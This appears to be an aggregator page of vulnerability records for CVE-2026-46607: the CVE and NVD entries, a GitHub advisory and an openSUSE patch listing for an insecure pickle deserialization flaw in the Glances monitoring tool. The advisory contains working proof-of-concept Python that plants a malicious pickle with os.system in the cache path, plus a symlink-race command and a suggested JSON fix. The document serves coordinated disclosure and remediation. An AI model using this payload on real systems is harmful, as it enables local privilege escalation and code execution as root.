Action not permitted
Modal body text goes here.
Modal Title
Modal Body
CVE-2026-46607 (GCVE-0-2026-46607)
Vulnerability from cvelistv5 – Published: 2026-06-25 18:04 – Updated: 2026-06-25 18:49
VLAI
EPSS
Title
Glances: Insecure Pickle Deserialization in Version Cache Leads to Arbitrary Code Execution
Summary
Glances is an open-source system cross-platform monitoring tool. Prior to 4.5.5, glances/outdated.py uses pickle.load() to read a version-check cache file stored at a predictable, world-accessible path (~/.cache/glances/glances-version.db or $XDG_CACHE_HOME/glances/glances-version.db). No integrity check, signature verification, or format validation is performed before deserialization. An attacker with write access to that path — through any of several realistic local or container-level scenarios — can plant a malicious pickle file and achieve arbitrary code execution as the OS user running Glances the next time it starts with version checking enabled (the default). This vulnerability is fixed in 4.5.5.
Severity
7.8 (High)
SSVC
Exploitation: poc
Automatable: no
Technical Impact: total
CISA Coordinator (v2.0.3)
CWE
- CWE-502 - Deserialization of Untrusted Data
Assigner
References
2 references
| URL | Tags |
|---|---|
| https://github.com/nicolargo/glances/security/adv… | x_refsource_CONFIRM |
| https://github.com/nicolargo/glances/releases/tag… | x_refsource_MISC |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-46607",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-06-25T18:49:13.379353Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-06-25T18:49:32.136Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://github.com/nicolargo/glances/security/advisories/GHSA-9837-48hr-q32j"
}
],
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "glances",
"vendor": "nicolargo",
"versions": [
{
"status": "affected",
"version": "\u003c 4.5.5"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Glances is an open-source system cross-platform monitoring tool. Prior to 4.5.5, glances/outdated.py uses pickle.load() to read a version-check cache file stored at a predictable, world-accessible path (~/.cache/glances/glances-version.db or $XDG_CACHE_HOME/glances/glances-version.db). No integrity check, signature verification, or format validation is performed before deserialization. An attacker with write access to that path \u2014 through any of several realistic local or container-level scenarios \u2014 can plant a malicious pickle file and achieve arbitrary code execution as the OS user running Glances the next time it starts with version checking enabled (the default). This vulnerability is fixed in 4.5.5."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-502",
"description": "CWE-502: Deserialization of Untrusted Data",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-06-25T18:04:25.780Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/nicolargo/glances/security/advisories/GHSA-9837-48hr-q32j",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/nicolargo/glances/security/advisories/GHSA-9837-48hr-q32j"
},
{
"name": "https://github.com/nicolargo/glances/releases/tag/v4.5.5",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/nicolargo/glances/releases/tag/v4.5.5"
}
],
"source": {
"advisory": "GHSA-9837-48hr-q32j",
"discovery": "UNKNOWN"
},
"title": "Glances: Insecure Pickle Deserialization in Version Cache Leads to Arbitrary Code Execution"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-46607",
"datePublished": "2026-06-25T18:04:25.780Z",
"dateReserved": "2026-05-15T19:34:14.011Z",
"dateUpdated": "2026-06-25T18:49:32.136Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"epss": {
"cve": "CVE-2026-46607",
"date": "2026-06-26",
"epss": "0.00303",
"percentile": "0.21906"
},
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-46607\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-06-25T18:49:13.379353Z\"}}}], \"references\": [{\"url\": \"https://github.com/nicolargo/glances/security/advisories/GHSA-9837-48hr-q32j\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-06-25T18:48:55.642Z\"}}], \"cna\": {\"title\": \"Glances: Insecure Pickle Deserialization in Version Cache Leads to Arbitrary Code Execution\", \"source\": {\"advisory\": \"GHSA-9837-48hr-q32j\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 7.8, \"attackVector\": \"LOCAL\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"nicolargo\", \"product\": \"glances\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 4.5.5\"}]}], \"references\": [{\"url\": \"https://github.com/nicolargo/glances/security/advisories/GHSA-9837-48hr-q32j\", \"name\": \"https://github.com/nicolargo/glances/security/advisories/GHSA-9837-48hr-q32j\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/nicolargo/glances/releases/tag/v4.5.5\", \"name\": \"https://github.com/nicolargo/glances/releases/tag/v4.5.5\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Glances is an open-source system cross-platform monitoring tool. Prior to 4.5.5, glances/outdated.py uses pickle.load() to read a version-check cache file stored at a predictable, world-accessible path (~/.cache/glances/glances-version.db or $XDG_CACHE_HOME/glances/glances-version.db). No integrity check, signature verification, or format validation is performed before deserialization. An attacker with write access to that path \\u2014 through any of several realistic local or container-level scenarios \\u2014 can plant a malicious pickle file and achieve arbitrary code execution as the OS user running Glances the next time it starts with version checking enabled (the default). This vulnerability is fixed in 4.5.5.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-502\", \"description\": \"CWE-502: Deserialization of Untrusted Data\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-06-25T18:04:25.780Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2026-46607\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-06-25T18:49:32.136Z\", \"dateReserved\": \"2026-05-15T19:34:14.011Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-06-25T18:04:25.780Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}
FKIE_CVE-2026-46607
Vulnerability from fkie_nvd - Published: 2026-06-25 19:16 - Updated: 2026-06-25 19:58
Severity
Summary
Glances is an open-source system cross-platform monitoring tool. Prior to 4.5.5, glances/outdated.py uses pickle.load() to read a version-check cache file stored at a predictable, world-accessible path (~/.cache/glances/glances-version.db or $XDG_CACHE_HOME/glances/glances-version.db). No integrity check, signature verification, or format validation is performed before deserialization. An attacker with write access to that path — through any of several realistic local or container-level scenarios — can plant a malicious pickle file and achieve arbitrary code execution as the OS user running Glances the next time it starts with version checking enabled (the default). This vulnerability is fixed in 4.5.5.
References
Impacted products
| Vendor | Product | Version |
|---|
{
"affected": [
{
"affectedData": [
{
"product": "glances",
"vendor": "nicolargo",
"versions": [
{
"status": "affected",
"version": "\u003c 4.5.5"
}
]
}
],
"source": "security-advisories@github.com"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Glances is an open-source system cross-platform monitoring tool. Prior to 4.5.5, glances/outdated.py uses pickle.load() to read a version-check cache file stored at a predictable, world-accessible path (~/.cache/glances/glances-version.db or $XDG_CACHE_HOME/glances/glances-version.db). No integrity check, signature verification, or format validation is performed before deserialization. An attacker with write access to that path \u2014 through any of several realistic local or container-level scenarios \u2014 can plant a malicious pickle file and achieve arbitrary code execution as the OS user running Glances the next time it starts with version checking enabled (the default). This vulnerability is fixed in 4.5.5."
}
],
"id": "CVE-2026-46607",
"lastModified": "2026-06-25T19:58:30.847",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "security-advisories@github.com",
"type": "Secondary"
}
],
"ssvcV203": [
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"ssvcData": {
"id": "CVE-2026-46607",
"options": [
{
"exploitation": "poc"
},
{
"automatable": "no"
},
{
"technicalImpact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-06-25T18:49:13.379353Z",
"version": "2.0.3"
}
}
]
},
"published": "2026-06-25T19:16:37.527",
"references": [
{
"source": "security-advisories@github.com",
"url": "https://github.com/nicolargo/glances/releases/tag/v4.5.5"
},
{
"source": "security-advisories@github.com",
"url": "https://github.com/nicolargo/glances/security/advisories/GHSA-9837-48hr-q32j"
},
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"url": "https://github.com/nicolargo/glances/security/advisories/GHSA-9837-48hr-q32j"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-502"
}
],
"source": "security-advisories@github.com",
"type": "Primary"
}
]
}
GHSA-9837-48HR-Q32J
Vulnerability from github – Published: 2026-06-22 21:21 – Updated: 2026-06-22 21:21
VLAI
Summary
Glances has Insecure Pickle Deserialization in its Version Cache that Leads to Arbitrary Code Execution
Details
Summary
glances/outdated.py uses pickle.load() to read a version-check cache file stored at a predictable, world-accessible path (~/.cache/glances/glances-version.db or $XDG_CACHE_HOME/glances/glances-version.db). No integrity check, signature verification, or format validation is performed before deserialization. An attacker with write access to that path — through any of several realistic local or container-level scenarios — can plant a malicious pickle file and achieve arbitrary code execution as the OS user running Glances the next time it starts with version checking enabled (the default).
Details
Affected file: glances/outdated.py, method Outdated._load_cache(), line 121
Direct URL (commit 04579778e733d705898a169e049dc84772c852da): - https://github.com/nicolargo/glances/blob/04579778e733d705898a169e049dc84772c852da/glances/outdated.py#L121
# outdated.py (_load_cache, line 119-127)
try:
with open(self.cache_file, 'rb') as f:
cached_data = pickle.load(f) # ← no integrity check
except Exception as e:
logger.debug(f"Cannot read version from cache file: {self.cache_file} ({e})")
...
self.cache_file is constructed from the XDG cache directory path at Outdated.__init__():
# outdated.py (__init__)
self.cache_file = os.path.join(
user_cache_dir('glances')[0],
'glances-version.db'
)
On a default Linux installation this resolves to /home/john/.cache/glances/glances-version.db (or /root/.cache/glances/… when Glances runs as root).
Python's pickle module is an execution-capable serialisation format: any class that implements __reduce__ can embed an arbitrary callable and argument tuple that Python will invoke unconditionally at pickle.load() time. There is no safe subset of pickle; the only safe mitigation is to not use it for untrusted data.
The code was verified on x86_64 Linux, Python 3.13, Glances 4.5.5_dev1 (commit 04579778e733d705898a169e049dc84772c852da). A malicious pickle crafted with os.system() via __reduce__ executed the injected shell command successfully before the surrounding Python code raised a TypeError.
PoC
Special configuration required
No non-default Glances configuration is needed. Version checking is enabled by default (check_update = true). The only pre condition is that the attacker can write to the Glances user's XDG cache directory — see the attack scenarios below for how this arises in practice.
Attack scenario A — local privilege escalation (shared multi-user host)
Prerequisites: Glances runs periodically (e.g. via systemd or cron) as a privileged user (root or a dedicated monitoring account). The attacker is an unprivileged local user who has write access to the Glances user's ~/.cache/glances/ directory (e.g. the directory or an ancestor is group- or world-writable, or was created with overly permissive umask).
Step 1 — Identify the cache path
python3 -c "from glances.config import user_cache_dir; print(user_cache_dir()[0])"
# Example output: /root/.cache/glances
Step 2 — Craft and plant a malicious pickle
import pickle, os, pathlib
class MaliciousPayload:
def __reduce__(self):
# This command runs as the Glances process user
cmd = 'id >> /tmp/glances_rce_proof.txt'
return (os.system, (cmd,))
cache_dir = pathlib.Path('/root/.cache/glances') # adjust to target
cache_file = cache_dir / 'glances-version.db'
cache_dir.mkdir(parents=True, exist_ok=True)
cache_file.write_bytes(pickle.dumps(MaliciousPayload()))
print(f'Payload written to {cache_file}')
Step 3 — Wait for Glances to start (or restart it)
Glances calls _load_cache() automatically at startup when check_update = true (the compiled-in default). No special configuration is required by the attacker.
Step 4 — Verify execution
cat /tmp/glances_rce_proof.txt
# uid=0(root) gid=0(root) groups=0(root) ← output from the Glances-user context
Attack scenario B — container / shared-volume poisoning
A compromised container that shares a Docker/Podman volume with the Glances container can write to the cache path on the shared volume. The next time Glances restarts (e.g. after a rolling update), the payload executes inside the Glances container with its privileges.
Attack scenario C — symlink race (TOCTOU)
Before the Glances cache directory is created for the first time (e.g. on a fresh installation), an attacker with write access to ~/.cache/ can create a symlink:
mkdir -p /home/john/.cache
ln -s /tmp/attacker_controlled /home/john/.cache/glances
When Glances writes its legitimate cache file it writes instead to /tmp/attacker_controlled/glances-version.db, which the attacker can replace with the malicious pickle before the next start.
Minimal self-contained reproduction
import sys, os, pickle, pathlib, argparse
sys.path.insert(0, '/path/to/glances') # adjust to local clone
FAKE_CACHE = pathlib.Path('/tmp/glances_test_cache')
CACHE_FILE = FAKE_CACHE / 'glances-version.db'
FAKE_CACHE.mkdir(parents=True, exist_ok=True)
class Exploit:
def __reduce__(self):
return (os.system, ('echo RCE_confirmed >> /tmp/glances_rce.txt',))
CACHE_FILE.write_bytes(pickle.dumps(Exploit()))
# Reproduce the exact Glances code path
from glances.outdated import Outdated
obj = object.__new__(Outdated)
obj.args = argparse.Namespace(disable_check_update=False, time=2)
obj.data = {}
obj.cache_file = str(CACHE_FILE)
try:
obj._load_cache() # pickle.load() fires here
except Exception:
pass # expected: int not subscriptable
import time; time.sleep(0.2)
print(pathlib.Path('/tmp/glances_rce.txt').read_text())
# Prints: RCE_confirmed
Impact
Vulnerability type: Insecure Deserialization (CWE-502)
Who is impacted: Any system where Glances is run with version checking enabled (the default) in a shared environment where a less-privileged process can write to the Glances user's XDG cache directory, or in any containerised deployment using shared volumes.
Impact: - Confidentiality: Full — the attacker gains code execution in the context of the Glances process and can read any data accessible to that user. - Integrity: Full — arbitrary commands can modify files, install persistence mechanisms, or alter system state. - Availability: Full — the Glances process and, if running as root, the system can be disrupted.
On many deployments Glances is run as root (required to access hardware performance counters without specific capabilities), meaning successful exploitation yields full root code execution without any further privilege escalation step.
Suggested Fix
Replace pickle with json for the version cache. The data stored is a simple Python dictionary containing two string values and a datetime object; a JSON representation is straightforward:
import json
from datetime import datetime
# Saving
with open(self.cache_file, 'w', encoding='utf-8') as f:
json.dump({
'installed_version': self.installed_version(),
'latest_version': latest,
'refresh_date': datetime.now().isoformat(),
}, f)
# Loading
with open(self.cache_file, 'r', encoding='utf-8') as f:
cached_data = json.load(f)
cached_data['refresh_date'] = datetime.fromisoformat(cached_data['refresh_date'])
If pickle is retained for any reason, the cache file must be protected with an HMAC keyed from a Glances-managed secret (e.g. a random key stored in the Glances config directory, which should itself be mode 0600).
As an additional hardening measure, restrict the permissions of the Glances cache directory to 0700 at creation time.
Responsible Disclosure
The AFINE Team is committed to responsible / coordinated disclosure. The AFINE Team will not publish details of this vulnerability or release exploit code publicly until a fix has been released, or 90 days have elapsed from the date of this report, whichever comes first.
Credits
This issue was identified by Michał Majchrowicz and Marcin Wyczechowski, members of the AFINE Team.
Severity
7.8 (High)
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "glances"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "4.5.5"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-46607"
],
"database_specific": {
"cwe_ids": [
"CWE-502"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-22T21:21:07Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "### Summary\n\n`glances/outdated.py` uses `pickle.load()` to read a version-check cache file stored at a predictable, world-accessible path (`~/.cache/glances/glances-version.db` or `$XDG_CACHE_HOME/glances/glances-version.db`). No integrity check, signature verification, or format validation is performed before deserialization. An attacker with write access to that path \u2014 through any of several realistic local or container-level scenarios \u2014 can plant a malicious pickle file and achieve arbitrary code execution as the OS user running Glances the next time it starts with version checking enabled (the default).\n\n---\n\n### Details\n\n**Affected file:** `glances/outdated.py`, method `Outdated._load_cache()`, line 121\n\n**Direct URL (commit 04579778e733d705898a169e049dc84772c852da):**\n- https://github.com/nicolargo/glances/blob/04579778e733d705898a169e049dc84772c852da/glances/outdated.py#L121\n\n```python\n# outdated.py (_load_cache, line 119-127)\ntry:\n with open(self.cache_file, \u0027rb\u0027) as f:\n cached_data = pickle.load(f) # \u2190 no integrity check\nexcept Exception as e:\n logger.debug(f\"Cannot read version from cache file: {self.cache_file} ({e})\")\n ...\n```\n\n`self.cache_file` is constructed from the XDG cache directory path at `Outdated.__init__()`:\n\n```python\n# outdated.py (__init__)\nself.cache_file = os.path.join(\n user_cache_dir(\u0027glances\u0027)[0],\n \u0027glances-version.db\u0027\n)\n```\n\nOn a default Linux installation this resolves to `/home/john/.cache/glances/glances-version.db` (or `/root/.cache/glances/\u2026` when Glances runs as root).\n\nPython\u0027s `pickle` module is an execution-capable serialisation format: any class that implements `__reduce__` can embed an arbitrary callable and argument tuple that Python will invoke unconditionally at `pickle.load()` time. There is no safe subset of pickle; the only safe mitigation is to not use it for untrusted data.\n\nThe code was verified on x86_64 Linux, Python 3.13, Glances 4.5.5_dev1 (commit 04579778e733d705898a169e049dc84772c852da). A malicious pickle crafted with `os.system()` via `__reduce__` executed the injected shell command successfully before the surrounding Python code raised a `TypeError`.\n\n---\n\n### PoC\n\n**Special configuration required**\n\nNo non-default Glances configuration is needed. Version checking is enabled by default (`check_update = true`). The only pre condition is that the attacker can write to the Glances user\u0027s XDG cache directory \u2014 see the attack scenarios below for how this arises in practice.\n\n---\n\n**Attack scenario A \u2014 local privilege escalation (shared multi-user host)**\n\nPrerequisites: Glances runs periodically (e.g. via systemd or cron) as a privileged user (root or a dedicated monitoring account). The attacker is an unprivileged local user who has write access to the Glances user\u0027s `~/.cache/glances/` directory (e.g. the directory or an ancestor is group- or world-writable, or was created with overly permissive umask).\n\n**Step 1 \u2014 Identify the cache path**\n\n```bash\npython3 -c \"from glances.config import user_cache_dir; print(user_cache_dir()[0])\"\n# Example output: /root/.cache/glances\n```\n\n**Step 2 \u2014 Craft and plant a malicious pickle**\n\n```python\nimport pickle, os, pathlib\n\nclass MaliciousPayload:\n def __reduce__(self):\n # This command runs as the Glances process user\n cmd = \u0027id \u003e\u003e /tmp/glances_rce_proof.txt\u0027\n return (os.system, (cmd,))\n\ncache_dir = pathlib.Path(\u0027/root/.cache/glances\u0027) # adjust to target\ncache_file = cache_dir / \u0027glances-version.db\u0027\ncache_dir.mkdir(parents=True, exist_ok=True)\ncache_file.write_bytes(pickle.dumps(MaliciousPayload()))\nprint(f\u0027Payload written to {cache_file}\u0027)\n```\n\n**Step 3 \u2014 Wait for Glances to start (or restart it)**\n\nGlances calls `_load_cache()` automatically at startup when `check_update = true` (the compiled-in default). No special configuration is required by the attacker.\n\n**Step 4 \u2014 Verify execution**\n\n```bash\ncat /tmp/glances_rce_proof.txt\n# uid=0(root) gid=0(root) groups=0(root) \u2190 output from the Glances-user context\n```\n\n---\n\n**Attack scenario B \u2014 container / shared-volume poisoning**\n\nA compromised container that shares a Docker/Podman volume with the Glances container can write to the cache path on the shared volume. The next time Glances restarts (e.g. after a rolling update), the payload executes inside the Glances container with its privileges.\n\n---\n\n**Attack scenario C \u2014 symlink race (TOCTOU)**\n\nBefore the Glances cache directory is created for the first time (e.g. on a fresh installation), an attacker with write access to `~/.cache/` can create a symlink:\n\n```bash\nmkdir -p /home/john/.cache\nln -s /tmp/attacker_controlled /home/john/.cache/glances\n```\n\nWhen Glances writes its legitimate cache file it writes instead to `/tmp/attacker_controlled/glances-version.db`, which the attacker can replace with the malicious pickle before the next start.\n\n---\n\n**Minimal self-contained reproduction**\n\n```python\nimport sys, os, pickle, pathlib, argparse\n\nsys.path.insert(0, \u0027/path/to/glances\u0027) # adjust to local clone\n\nFAKE_CACHE = pathlib.Path(\u0027/tmp/glances_test_cache\u0027)\nCACHE_FILE = FAKE_CACHE / \u0027glances-version.db\u0027\nFAKE_CACHE.mkdir(parents=True, exist_ok=True)\n\nclass Exploit:\n def __reduce__(self):\n return (os.system, (\u0027echo RCE_confirmed \u003e\u003e /tmp/glances_rce.txt\u0027,))\n\nCACHE_FILE.write_bytes(pickle.dumps(Exploit()))\n\n# Reproduce the exact Glances code path\nfrom glances.outdated import Outdated\nobj = object.__new__(Outdated)\nobj.args = argparse.Namespace(disable_check_update=False, time=2)\nobj.data = {}\nobj.cache_file = str(CACHE_FILE)\n\ntry:\n obj._load_cache() # pickle.load() fires here\nexcept Exception:\n pass # expected: int not subscriptable\n\nimport time; time.sleep(0.2)\nprint(pathlib.Path(\u0027/tmp/glances_rce.txt\u0027).read_text())\n# Prints: RCE_confirmed\n```\n\n---\n\n### Impact\n\n**Vulnerability type:** Insecure Deserialization (CWE-502)\n\n**Who is impacted:** Any system where Glances is run with version checking enabled (the default) in a shared environment where a less-privileged process can write to the Glances user\u0027s XDG cache directory, or in any containerised deployment using shared volumes.\n\n**Impact:**\n- **Confidentiality:** Full \u2014 the attacker gains code execution in the context of the Glances process and can read any data accessible to that user.\n- **Integrity:** Full \u2014 arbitrary commands can modify files, install persistence mechanisms, or alter system state.\n- **Availability:** Full \u2014 the Glances process and, if running as root, the system can be disrupted.\n\nOn many deployments Glances is run as root (required to access hardware performance counters without specific capabilities), meaning successful exploitation yields full root code execution without any further privilege escalation step.\n\n---\n\n### Suggested Fix\n\nReplace `pickle` with `json` for the version cache. The data stored is a simple Python dictionary containing two string values and a `datetime` object; a JSON representation is straightforward:\n\n```python\nimport json\nfrom datetime import datetime\n\n# Saving\nwith open(self.cache_file, \u0027w\u0027, encoding=\u0027utf-8\u0027) as f:\n json.dump({\n \u0027installed_version\u0027: self.installed_version(),\n \u0027latest_version\u0027: latest,\n \u0027refresh_date\u0027: datetime.now().isoformat(),\n }, f)\n\n# Loading\nwith open(self.cache_file, \u0027r\u0027, encoding=\u0027utf-8\u0027) as f:\n cached_data = json.load(f)\n cached_data[\u0027refresh_date\u0027] = datetime.fromisoformat(cached_data[\u0027refresh_date\u0027])\n```\n\nIf pickle is retained for any reason, the cache file must be protected with an HMAC keyed from a Glances-managed secret (e.g. a random key stored in the Glances config directory, which should itself be mode 0600).\n\nAs an additional hardening measure, restrict the permissions of the Glances cache directory to 0700 at creation time.\n\n---\n\n### Responsible Disclosure\n\nThe AFINE Team is committed to responsible / coordinated disclosure. The AFINE Team will not publish details of this vulnerability or release exploit code publicly until a fix has been released, or 90 days have elapsed from the date of this report, whichever comes first.\n\n---\n\n### Credits\n\nThis issue was identified by Micha\u0142 Majchrowicz and Marcin Wyczechowski, members of the AFINE Team.\n\n---",
"id": "GHSA-9837-48hr-q32j",
"modified": "2026-06-22T21:21:07Z",
"published": "2026-06-22T21:21:07Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/nicolargo/glances/security/advisories/GHSA-9837-48hr-q32j"
},
{
"type": "PACKAGE",
"url": "https://github.com/nicolargo/glances"
},
{
"type": "WEB",
"url": "https://github.com/nicolargo/glances/releases/tag/v4.5.5"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Glances has Insecure Pickle Deserialization in its Version Cache that Leads to Arbitrary Code Execution"
}
OPENSUSE-SU-2026:11122-1
Vulnerability from csaf_opensuse - Published: 2026-06-25 00:00 - Updated: 2026-06-25 00:00Summary
glances-common-4.5.5-1.1 on GA media
Severity
Moderate
Notes
Title of the patch: glances-common-4.5.5-1.1 on GA media
Description of the patch: These are all security issues fixed in the glances-common-4.5.5-1.1 package on the GA media of openSUSE Tumbleweed.
Patchnames: openSUSE-Tumbleweed-2026-11122
Terms of use: CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
7.8 (High)
Affected products
Recommended
16 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.8 (High)
Affected products
Recommended
16 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.4 (High)
Affected products
Recommended
16 products
